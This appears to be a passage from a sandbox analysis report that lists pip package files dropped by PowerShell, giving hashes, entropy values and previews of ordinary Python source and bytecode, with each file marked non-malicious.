                                                                                                    Preview:........=.Cf..........................&.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j&..................e.........Z.e.j,..................d.e.d.e.d.....f.d...........Z.e.j,..................d.e.d.....f.d...........Z...G.d...d.e.........Z...G.d...d.........Z.y.)......N)...TracebackType)...Dict..Generator..Optional..Set..Type..Union)...Link)...InstallRequirement)...TempDirectory..changes..return..NNNc................+.......K.....t.........j...................}.t.................}.i.}.|.j...........................D.]...\...}.}...|.|.....|.|.<...|.|.|.<.........d.......|.j...........................D.]$..\...}.}.|.|.u.r.|.|.=...t.........|.t.................s.J...|.|.|.<....&..y.#.t.........$.r...|.|.|.<...Y..Tw.x.Y.w.#.|.j...........................D.]$..\...}.}.|.|.u.r.|.|.=...t.........|.t.................s.J...|.|.|.<....&..w.x.Y.w...w...N)...os..environ..object..items..KeyError..isinstance..str).r......targ
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1889
                                                                                                    Entropy (8bit):5.654316903998134
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:ECXBpNb0HZkeJvTlXI86J5ZJYZjpmlLCGi2C5b/PHeBR98/W3VaUz8zYbxDQ1tOl:ECXBXWk0LhIaZjpml+L2C58Q/Wfxa1tK
                                                                                                    MD5:32A362FEC7CA4430DCF002D0B6582F99
                                                                                                    SHA1:9A3533CABAC7A0728E7D35AD80FD2A2A5C14DE0E
                                                                                                    SHA-256:4D55694731B043CBCD90D2A53FF007B8D457613D6FEBFAA7E2915EF3B98516D7
                                                                                                    SHA-512:D9D8983BEC5FE5D361294B98B66BF9BF95BE064FFAD2EBDA27B11C0FECD6DA03506A93264FCF6BCC4B86F0292E8B825F86E0B1DEE1F715EE5D48B1412D401A81
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf..........................h.....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.e.d.e.d.e.d.e.f.d...Z.y.).z4Metadata generation logic for source distributions.......N)...BuildBackendHookCaller)...BuildEnvironment)...InstallationSubprocessError..MetadataGenerationFailed)...runner_with_spinner_message)...TempDirectory..build_env..backend..details..returnc.....................f.....t.........d.d...........}.|.j...................}.|.5...t.........d.........}.|.j...................|.........5.....|.j...................|.........}...d.d.d...........d.d.d...........t.........j...................j...................|...........S.#.t.........$.r.}.t.........|...........|...d.}.~.w.w.x.Y.w.#.1.s.w...Y......Ox.Y.w.#.1.s.w...Y......Sx.Y.w.).zlGenerate metadata using mechanisms described in PEP 517... Returns the generated metadata directory.. z.modern-metadataT)...kind..globally_managedz#Preparing metadata (pyproject.toml))...package_detailsN).r....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1923
                                                                                                    Entropy (8bit):5.660358782698872
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:2bCXBXWk0LhIaZjpmW+H62I5D/LQua1tw:26XP0VIaZjx+Ho5D8Q
                                                                                                    MD5:10CD6097ED5F3BEB6E80F75103C82AB7
                                                                                                    SHA1:2B84E67A397C4AFC72157BB7FEFC2ADA297F1E41
                                                                                                    SHA-256:B592C57C49B9A97632EB846AB5294CD77E7F67CF0BC7A80248E33E67B9066456
                                                                                                    SHA-512:AEC13990BA3F1478DC26FF127A924A4DFE6D6991313C07084C87D78A6229C93EB47EC8286B2FC5D5DE5DCF268AC9552547FCD09FCA15D4EB3156867B81C3F42D
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf..........................h.....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.e.d.e.d.e.d.e.f.d...Z.y.).z4Metadata generation logic for source distributions.......N)...BuildBackendHookCaller)...BuildEnvironment)...InstallationSubprocessError..MetadataGenerationFailed)...runner_with_spinner_message)...TempDirectory..build_env..backend..details..returnc.....................f.....t.........d.d...........}.|.j...................}.|.5...t.........d.........}.|.j...................|.........5.....|.j...................|.........}...d.d.d...........d.d.d...........t.........j...................j...................|...........S.#.t.........$.r.}.t.........|...........|...d.}.~.w.w.x.Y.w.#.1.s.w...Y......Ox.Y.w.#.1.s.w...Y......Sx.Y.w.).zlGenerate metadata using mechanisms described in PEP 660... Returns the generated metadata directory.. z.modern-metadataT)...kind..globally_managedz,Preparing editable metadata (pyproject.toml))...package_detail
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3074
                                                                                                    Entropy (8bit):5.682050044118197
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:OhRGnLcy+K9YkJPL2P0nc5j5q1oFY+TpElN2CUyGv5JcgesigO3bHtq7:OwLcy+mJPL2tFY+TpgUPHcIsHu
                                                                                                    MD5:23226B1A9DF8E1D0134F171F295D21CA
                                                                                                    SHA1:1EC537337D5B29F02E49BFACE41E35AEBB088E0E
                                                                                                    SHA-256:7380AA6AA5470E5B5A9D6D40DE3EA9E3865DBAF71FDD3C9A576696B1DBC55688
                                                                                                    SHA-512:192A0D23BA8E759C662431B4A2BF98F4004D06B607ACC3A628F7E7F9A17E5481BCF64F97913E23B9F4E6FF60FF50E1B283803D3A338D94E5259C37F86A7CDD69
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf...............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j"..................e.........Z.d.e.d.e.f.d...Z.d.e.d.e.d.e.d.e.d.e.d.e.f.d...Z.y.).z;Metadata generation logic for legacy source distributions.......N)...BuildEnvironment)...open_spinner)...InstallationError..InstallationSubprocessError..MetadataGenerationFailed)...make_setuptools_egg_info_args)...call_subprocess)...TempDirectory..directory..returnc.....................*.....t.........j...................|.........D...c.g.c.]...}.|.j...................d.........s...|.......}.}.|.s.t.........d.|...............t.........|.........d.kD..r.t.........d.j...................|...................t.........j...................j...................|.|.d.............S.c...c.}.w.).z.Find an .egg-info subdirectory in `directory`.z..egg-infoz No .egg-info directory found in .....z-More than one .egg-info directory found in {}r....)...os..listdir..endswith
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1693
                                                                                                    Entropy (8bit):5.611738604971842
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:iWsvKb7k+s4vDHvS2gkuS6aStsPPgE3Hgwr2Wyv2txl6zyDM5wt9S:0vKbwEK2F+Q/6230zdY9S
                                                                                                    MD5:EA3BE896DD5BC494B745CE5D067CAC85
                                                                                                    SHA1:894C86C3826E36D2FAA3CED593A016DBF144343A
                                                                                                    SHA-256:DDD2C8862941D57DE69A163B63803692A58204CEF47BB21884C10A5A83B030B2
                                                                                                    SHA-512:86A9C0164D94D53DBF76B07F4267EB719B1ED3638B0CFC1789EDF7E739CD26453555BA17263A77CB20F3EC65CA92B659899AF283D81B951D23FDB9970F34B87D
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf3.........................~.....d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j...................e.........Z.d.e.d.e.d.e.d.e.d.e.e.....f.d...Z.y.)......N)...Optional)...BuildBackendHookCaller)...runner_with_spinner_message..name..backend..metadata_directory..tempd..returnc.....................R.....|...J.....t.........j...................d.|...........t.........d.|...d...........}.|.j...................|.........5...|.j...................|.|...........}.d.d.d...........t.........j...................j...................|...........S.#.1.s.w...Y......)x.Y.w.#.t.........$.r...t.........j...................d.|...........Y.y.w.x.Y.w.).z.Build one InstallRequirement using the PEP 517 build process... Returns path to wheel if successfully built. Otherwise, returns None.. Nz.Destination directory: %sz.Building wheel for z. (pyproject.toml)).r....z.Failed building wheel for %s)...logger..debugr......subprocess_runner..build_wheel..Exception..error..os..path..join).r
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2034
                                                                                                    Entropy (8bit):5.679731654498929
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:OZZoPzvKzxOtG2F0PSqfJneUIg9qFZ0zOVw:C+b68c2CPSfPgaA
                                                                                                    MD5:081A2AD471A734F57A7917FBC36D9666
                                                                                                    SHA1:B11F45C8345F6F203D84678AB6A9FF32C5895249
                                                                                                    SHA-256:15C57991AF842DD115115BCED63B865CB411ED87443621BD3A21685D73CB1552
                                                                                                    SHA-512:1D306B7D7CF9B4542A3B3039D025956430D174312AD7CC0D0D3B9D3AA1615EC98F59231473DB07651A4398915F2CF707DF3CF2807898D0D03B2E8940262BCD69
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf...............................d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.....e.j...................e.........Z.d.e.d.e.d.e.d.e.d.e.e.....f.d...Z.y.)......N)...Optional)...BuildBackendHookCaller..HookMissing)...runner_with_spinner_message..name..backend..metadata_directory..tempd..returnc...........................|...J.....t.........j...................d.|...........t.........d.|...d...........}.|.j...................|.........5.....|.j...................|.|...........}...d.d.d...........t.........j...................j...................|...........S.#.t.........$.r)}.t.........j...................d.|.|...........Y.d.}.~.d.d.d...........y.d.}.~.w.w.x.Y.w.#.1.s.w...Y......^x.Y.w.#.t.........$.r...t.........j...................d.|...........Y.y.w.x.Y.w.).z.Build one InstallRequirement using the PEP 660 build process... Returns path to wheel if successfully built. Otherwise, returns None.. Nz.Destination directory: %sz.Building editable for z. (pyproject.tom
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3938
                                                                                                    Entropy (8bit):5.628846380826758
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rFeM+G3ATAZOGAuHy+pNjws8bQZNcfwYRQammfU+S22N57a+tPZ6ksMpIIyN7Rc3:BV3zKzUjwnaKfZR6+S2szPZrsN7cCNe
                                                                                                    MD5:40896534D47A804263B92A7448349834
                                                                                                    SHA1:9DBAE030A5331F487115DD10C4E6913B3C4C34FD
                                                                                                    SHA-256:7B550EDC43F97254EFD070ED8188B620A31E19D2F84170FF90FBB8202E603456
                                                                                                    SHA-512:886ACD20BDCEA989D575E11782AB7CF2E6AAFEB455C42E7F428FF69709E3AFEF008794956342311109CEBCA6531EF9ABD4535982A89358EA7C2CCE8D53A16563
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf................................d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.....e.j...................e.........Z.d.e.e.....d.e.d.e.f.d...Z.d.e.e.....d.e.d.e.d.e.e.....d.e.d.e.e.....f.d...Z.d.e.d.e.d.e.d.e.e.....d.e.e.....d.e.d.e.e.....f.d...Z.y.)......N)...List..Optional)...open_spinner).. make_setuptools_bdist_wheel_args)...call_subprocess..format_command_args..command_args..command_output..returnc...........................t.........|.........}.d.|...d...}.|.s.|.d.z...}.|.S.t.........j...........................t.........j...................kD..r.|.d.z...}.|.S.|.j...................d.........s.|.d.z...}.|.d.|.....z...}.|.S.).z'Format command information for logging.z.Command arguments: ...z.Command output: Nonez'Command output: [use --verbose to show]z.Command output:.).r......logger..getEffectiveLevel..logging..DEBUG..endswith).r....r......command_desc..texts.... .wC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4832
                                                                                                    Entropy (8bit):4.618328684403838
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:IOYy0tIvdlzsjYMxasmoX2oL5QTUVan0FHPYQxai:IDywSldyiz0FHBai
                                                                                                    MD5:F96311DD96F1BE4BB365524BE991BE50
                                                                                                    SHA1:AD8A4AB522BB9F567A393CF6D0DE5ED1314CBAB7
                                                                                                    SHA-256:CFE1F90CE92765D05ADDD87656AE9504C639A8B6082A6963DA9E821992B92DCF
                                                                                                    SHA-512:D9E4F2BA33DE58F3F040D3DA293016EDB25BE0D02642F52947D0483B84E3851E644113672EA58C70123FADE9CDCE99B47239849CE0D14DE714EC1D37976FF854
                                                                                                    Malicious:false
                                                                                                    Preview:import contextlib.import hashlib.import logging.import os.from types import TracebackType.from typing import Dict, Generator, Optional, Set, Type, Union..from pip._internal.models.link import Link.from pip._internal.req.req_install import InstallRequirement.from pip._internal.utils.temp_dir import TempDirectory..logger = logging.getLogger(__name__)...@contextlib.contextmanager.def update_env_context_manager(**changes: str) -> Generator[None, None, None]:. target = os.environ.. # Save values from the target and change them.. non_existent_marker = object(). saved_values: Dict[str, Union[object, str]] = {}. for name, new_value in changes.items():. try:. saved_values[name] = target[name]. except KeyError:. saved_values[name] = non_existent_marker. target[name] = new_value.. try:. yield. finally:. # Restore original values in the target.. for name, original_value in saved_values.items():. if orig
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1422
                                                                                                    Entropy (8bit):4.6243304875946425
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Ab0HQNdptouYXrkezPAZDI8QE2jbZjpmlLCGIJtHvH5lp0y2C5FX/P66fmepkety:AnNJSkO8QLjbZjpml+VvWy2C5ocnkyE/
                                                                                                    MD5:39771CD0BE98EC2FA8E622FDA059FDF0
                                                                                                    SHA1:C816FD8F874F799A9620D92DB505598D21C82BA8
                                                                                                    SHA-256:F52D02503F14DD0A99797A7E672B7C1F1C14F74944E10AE760382BA990F30677
                                                                                                    SHA-512:578A0446D208F615FADDA5C21CAEEAF4DF744572111C6043ADE541BFC142AC6354F4DE0E24DEC4D31535F433A1A663CF661C121351DCDBCA2510D0AEAD8F8A1E
                                                                                                    Malicious:false
                                                                                                    Preview:"""Metadata generation logic for source distributions.."""..import os..from pip._vendor.pyproject_hooks import BuildBackendHookCaller..from pip._internal.build_env import BuildEnvironment.from pip._internal.exceptions import (. InstallationSubprocessError,. MetadataGenerationFailed,.).from pip._internal.utils.subprocess import runner_with_spinner_message.from pip._internal.utils.temp_dir import TempDirectory...def generate_metadata(. build_env: BuildEnvironment, backend: BuildBackendHookCaller, details: str.) -> str:. """Generate metadata using mechanisms described in PEP 517... Returns the generated metadata directory.. """. metadata_tmpdir = TempDirectory(kind="modern-metadata", globally_managed=True).. metadata_dir = metadata_tmpdir.path.. with build_env:. # Note that BuildBackendHookCaller implements a fallback for. # prepare_metadata_for_build_wheel, so we don't have to. # consider the possibility that this hook doesn't exist..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1474
                                                                                                    Entropy (8bit):4.593686499595817
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Ab0HQNdptouYXrkezPAEBDI8QE2jbZjpmWLCGIJtHvH5lp9E2PA57/P66fmedQkX:AnNJSkx8QLjbZjpmW+VvLE2I5ucTQkyo
                                                                                                    MD5:E46DA46FB32FE4B45B9961E977915B95
                                                                                                    SHA1:DF9F933316C1DBFE666BFB169C6DE0D2884C74E6
                                                                                                    SHA-256:54B2FB2EF9ED284F2AC5D854744261728B45CD4B0E488F0D352D38DF150B29EC
                                                                                                    SHA-512:A25E7D52711F6FC40EB819C217CE90AF874ABA5CAE67B31272941DC7D151EAA8C57FCEF62EDB1835BE2AD6EEF6DBA0283CCA732361E7F20D7C6E4A0812D4A9E7
                                                                                                    Malicious:false
                                                                                                    Preview:"""Metadata generation logic for source distributions.."""..import os..from pip._vendor.pyproject_hooks import BuildBackendHookCaller..from pip._internal.build_env import BuildEnvironment.from pip._internal.exceptions import (. InstallationSubprocessError,. MetadataGenerationFailed,.).from pip._internal.utils.subprocess import runner_with_spinner_message.from pip._internal.utils.temp_dir import TempDirectory...def generate_editable_metadata(. build_env: BuildEnvironment, backend: BuildBackendHookCaller, details: str.) -> str:. """Generate metadata using mechanisms described in PEP 660... Returns the generated metadata directory.. """. metadata_tmpdir = TempDirectory(kind="modern-metadata", globally_managed=True).. metadata_dir = metadata_tmpdir.path.. with build_env:. # Note that BuildBackendHookCaller implements a fallback for. # prepare_metadata_for_build_wheel/editable, so we don't have to. # consider the possibility that this hook doe
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2198
                                                                                                    Entropy (8bit):4.514631026862264
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:AyFTclkcBb5euAi9e6qa3h48Q4UOFY+2EVi/e2CFkyz1RJ5i:AyFTxcr13C8VFY+2lGCuRO
                                                                                                    MD5:8D1B8A2EC71166ECC0014C332636D8E2
                                                                                                    SHA1:01B6632B02F1FCA9880DACF96142556D33F159BB
                                                                                                    SHA-256:A3E794DB502CD7BE610C2EDD96E3357C927F16AA244C84A1C96A6329A2291D9C
                                                                                                    SHA-512:C6314BE4C5E87A9C7A4253DFCB26163666DF242834DFB3AE0B86CA2D2127AB39B1993FAAC474B4AC0E5A49A2B13A65C1166C2B0B72C0B0B6D3F567A375460A3D
                                                                                                    Malicious:false
                                                                                                    Preview:"""Metadata generation logic for legacy source distributions.."""..import logging.import os..from pip._internal.build_env import BuildEnvironment.from pip._internal.cli.spinners import open_spinner.from pip._internal.exceptions import (. InstallationError,. InstallationSubprocessError,. MetadataGenerationFailed,.).from pip._internal.utils.setuptools_build import make_setuptools_egg_info_args.from pip._internal.utils.subprocess import call_subprocess.from pip._internal.utils.temp_dir import TempDirectory..logger = logging.getLogger(__name__)...def _find_egg_info(directory: str) -> str:. """Find an .egg-info subdirectory in `directory`.""". filenames = [f for f in os.listdir(directory) if f.endswith(".egg-info")].. if not filenames:. raise InstallationError(f"No .egg-info directory found in {directory}").. if len(filenames) > 1:. raise InstallationError(. "More than one .egg-info directory found in {}".format(directory). ).. return
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1075
                                                                                                    Entropy (8bit):4.592001270993553
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:tmdptPRVjWqaS2drOX8Sq7/P6R2TBNSSREhL:CdjP2dKXIuET3pEhL
                                                                                                    MD5:BFD26E6B7D053BEAE312119DF6233540
                                                                                                    SHA1:DCD764C358F280CC9FDB2E90AB06A9686D3F21BA
                                                                                                    SHA-256:B13D761412C0C430BAC32AC3A2B87C92F719D631B9A889C2456CF33FE5242624
                                                                                                    SHA-512:04462A2559C1FDD8815BEE2762899581B620D3035BE6CDF97BD081B9901B4DE633352C8D8D8444A13D6A549C6608C3420FD9717EDC0705BB5AFAC9F98897C6B8
                                                                                                    Malicious:false
                                                                                                    Preview:import logging.import os.from typing import Optional..from pip._vendor.pyproject_hooks import BuildBackendHookCaller..from pip._internal.utils.subprocess import runner_with_spinner_message..logger = logging.getLogger(__name__)...def build_wheel_pep517(. name: str,. backend: BuildBackendHookCaller,. metadata_directory: str,. tempd: str,.) -> Optional[str]:. """Build one InstallRequirement using the PEP 517 build process... Returns path to wheel if successfully built. Otherwise, returns None.. """. assert metadata_directory is not None. try:. logger.debug("Destination directory: %s", tempd).. runner = runner_with_spinner_message(. f"Building wheel for {name} (pyproject.toml)". ). with backend.subprocess_runner(runner):. wheel_name = backend.build_wheel(. tempd,. metadata_directory=metadata_directory,. ). except Exception:. logger.error("Failed building wheel for
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1417
                                                                                                    Entropy (8bit):4.3101463528891335
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:tmdp9vaPCXvF6jWqat2drOXzP7/P66R2lvFIBNDcPzsdFjyEhL:C9vHXvgjI2dKXruXlva3DssdF2EhL
                                                                                                    MD5:D481FB9C7608F878A84FB81A8A7AA2D1
                                                                                                    SHA1:1D8E256134A57F9C5FA78BB388B31B61D2D0C3CE
                                                                                                    SHA-256:C8EB681FACE9024A0A60452DAFC161CEB62790D1D0690063590D8761A7B53108
                                                                                                    SHA-512:6DFC8DD2DDBDA76D94096930883688E83D50904173BFD1F6AB4F7EC3A4BA026B879059AD5443884F558C537234D38E22D43917DF406BB072B9C2898F0D12D859
                                                                                                    Malicious:false
                                                                                                    Preview:import logging.import os.from typing import Optional..from pip._vendor.pyproject_hooks import BuildBackendHookCaller, HookMissing..from pip._internal.utils.subprocess import runner_with_spinner_message..logger = logging.getLogger(__name__)...def build_wheel_editable(. name: str,. backend: BuildBackendHookCaller,. metadata_directory: str,. tempd: str,.) -> Optional[str]:. """Build one InstallRequirement using the PEP 660 build process... Returns path to wheel if successfully built. Otherwise, returns None.. """. assert metadata_directory is not None. try:. logger.debug("Destination directory: %s", tempd).. runner = runner_with_spinner_message(. f"Building editable for {name} (pyproject.toml)". ). with backend.subprocess_runner(runner):. try:. wheel_name = backend.build_editable(. tempd,. metadata_directory=metadata_directory,. ). exc
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3064
                                                                                                    Entropy (8bit):4.513661919781371
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:PB2BMxxA1CiycvkJAWlQprspdzSCgGZnhqaLd8VsgS2QVMaGrXbF4+g9:PB2BT6JAWyprudz+GZnwOd8igS2QSFVS
                                                                                                    MD5:3A5B36046CFE14561424A5E1EFB50CBB
                                                                                                    SHA1:30C3511EBD59DC05391D5239455C12D74E697BC0
                                                                                                    SHA-256:0BD8FAAEE920408D67FC97902E8646B8375F530CC25D287221D3D3A7A79D6CC4
                                                                                                    SHA-512:BF8AC3322DFFD7B07975E05FF212345F240325204B7A87D55CBB0AEACA7BEA38DB68BB9EFC3330C807B73677FA5B9C0AE17795E2C448CF590439F252DC0E84AA
                                                                                                    Malicious:false
                                                                                                    Preview:import logging.import os.path.from typing import List, Optional..from pip._internal.cli.spinners import open_spinner.from pip._internal.utils.setuptools_build import make_setuptools_bdist_wheel_args.from pip._internal.utils.subprocess import call_subprocess, format_command_args..logger = logging.getLogger(__name__)...def format_command_result(. command_args: List[str],. command_output: str,.) -> str:. """Format command information for logging.""". command_desc = format_command_args(command_args). text = f"Command arguments: {command_desc}\n".. if not command_output:. text += "Command output: None". elif logger.getEffectiveLevel() > logging.DEBUG:. text += "Command output: [use --verbose to show]". else:. if not command_output.endswith("\n"):. command_output += "\n". text += f"Command output:\n{command_output}".. return text...def get_legacy_build_wheel_path(. names: List[str],. temp_dir: str,. name: str,. com
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6806
                                                                                                    Entropy (8bit):4.482733839291248
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:kWH42xp5561FL56bMEHANrxR66YyvtsXS3y5PLEuLDMqaj7/ADyRWNQTJhDxE:kWNxFMFFQMrPyyvipi/AAWNQFtS
                                                                                                    MD5:F2F39E7FF5671C534F4F335E773B9C5A
                                                                                                    SHA1:D97AC05828EE730EE5B14A6F6E28DCE98A4F0B96
                                                                                                    SHA-256:7ECA80F3C8866AA7ED0ABDAD94FDEC494DB4D824A4A0E0D1B56D0EF8953D3386
                                                                                                    SHA-512:F0BC7552E171ED2963A7B12F55E6652CF334B3FF27E57810737A73909174B58D99B216D1D9C3DE92619F6A7F08A9F59B0FFDAD1300192272B6AA7732005E66B5
                                                                                                    Malicious:false
                                                                                                    Preview:"""Validation of dependencies of packages."""..import logging.from typing import Callable, Dict, List, NamedTuple, Optional, Set, Tuple..from pip._vendor.packaging.requirements import Requirement.from pip._vendor.packaging.specifiers import LegacySpecifier.from pip._vendor.packaging.utils import NormalizedName, canonicalize_name.from pip._vendor.packaging.version import LegacyVersion..from pip._internal.distributions import make_distribution_for_install_requirement.from pip._internal.metadata import get_default_environment.from pip._internal.metadata.base import DistributionVersion.from pip._internal.req.req_install import InstallRequirement.from pip._internal.utils.deprecation import deprecated..logger = logging.getLogger(__name__)...class PackageDetails(NamedTuple):. version: DistributionVersion. dependencies: List[Requirement]...# Shorthands.PackageSet = Dict[NormalizedName, PackageDetails].Missing = Tuple[NormalizedName, Requirement].Conflicting = Tuple[NormalizedName, Distri
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9816
                                                                                                    Entropy (8bit):4.064319785232956
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:wKXwcXVX29FLZPq1gaFYD8uDMNBrVbFhZ0DID53hC/rP3Wf3WFcdbvRMuPV:wKnIMev8ue2/rueFcdlh
                                                                                                    MD5:7DD939A42B1612389F3D939F07D813B7
                                                                                                    SHA1:BFC4FAB55E20829097432E39193CDC13C99A3D10
                                                                                                    SHA-256:BAAA1E4C07FA1CE615311D948004FC37CE54668184544A1075A9FF028E9239F9
                                                                                                    SHA-512:33F913AD806204AB63A5DD080A708B24362A0ED74A9958A0357A1BC505A9BA9EA4FB1497BDE8370AB12DD8AE9B64F15642DE91A077F1194485A6CD23CDA6C86E
                                                                                                    Malicious:false
                                                                                                    Preview:import collections.import logging.import os.from typing import Container, Dict, Generator, Iterable, List, NamedTuple, Optional, Set..from pip._vendor.packaging.utils import canonicalize_name.from pip._vendor.packaging.version import Version..from pip._internal.exceptions import BadCommand, InstallationError.from pip._internal.metadata import BaseDistribution, get_environment.from pip._internal.req.constructors import (. install_req_from_editable,. install_req_from_line,.).from pip._internal.req.req_file import COMMENT_RE.from pip._internal.utils.direct_url_helpers import direct_url_as_pep440_direct_reference..logger = logging.getLogger(__name__)...class _EditableInfo(NamedTuple):. requirement: str. comments: List[str]...def freeze(. requirement: Optional[List[str]] = None,. local_only: bool = False,. user_only: bool = False,. paths: Optional[List[str]] = None,. isolated: bool = False,. exclude_editable: bool = False,. skip: Container[str] = (),.) -> Ge
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):51
                                                                                                    Entropy (8bit):4.155090479515533
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:d/IF7CL5Dv:RI5CLdv
                                                                                                    MD5:C6F771F71FE2E186FB048050F4D2E467
                                                                                                    SHA1:C72C58E6CD7763F27AC8041D54F6390149AFC48E
                                                                                                    SHA-256:997EE1C83D863413B69851A8903437D2BFC65EFED8FCF2DDB71714BF5E387BEB
                                                                                                    SHA-512:A2A8D3F7862E8260EBC53B6670830104DCCD73A6292E1ECEF40379A167BAC510F81A3583C3AFA0EAAF6632BE771DCC54BE22F00330938B42B70B331DC42A9A0F
                                                                                                    Malicious:false
                                                                                                    Preview:"""For modules related to installing packages..""".
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):275
                                                                                                    Entropy (8bit):5.103910727887639
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:rUctaCCAI5CLf/Z6B0WltBn23d6oAreKAqAImZEqc6IaYleHXlll:gctaCC5cLp6BvPAImbsKYjaYkH1ll
                                                                                                    MD5:199D245BEFC5BCF01835D6A37EF19325
                                                                                                    SHA1:F6089CAD6E503DD1AA5278B94F3E87694234D32F
                                                                                                    SHA-256:B4DD84219340EA78EFFBD8E577993C8D8F8FB62CCF5EFBD1664529B791C8E46E
                                                                                                    SHA-512:1416E1369EB9A556EB62D807306B04F2AFDB57D4F1E1E134865291FBD4ABC25EC30C1B674AC9745BCC665501299A2D31D50786E9650C22FB251CCB81C1BD0837
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf3...............................d.Z.y.).z,For modules related to installing packages..N)...__doc__........uC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/operations/install/__init__.py..<module>r........s..............r....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1826
                                                                                                    Entropy (8bit):5.637739724451762
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:2A+qkNlXWRZR+0NtpdI1QPEz98/mBs8C7CphPtIf:2zXGRn+iJkQPEz98MZhC
                                                                                                    MD5:D3280E67FD5F196748C3BC42CBB7FD9A
                                                                                                    SHA1:145215D35D567A90A26ABABDFC2423D5C0E1E973
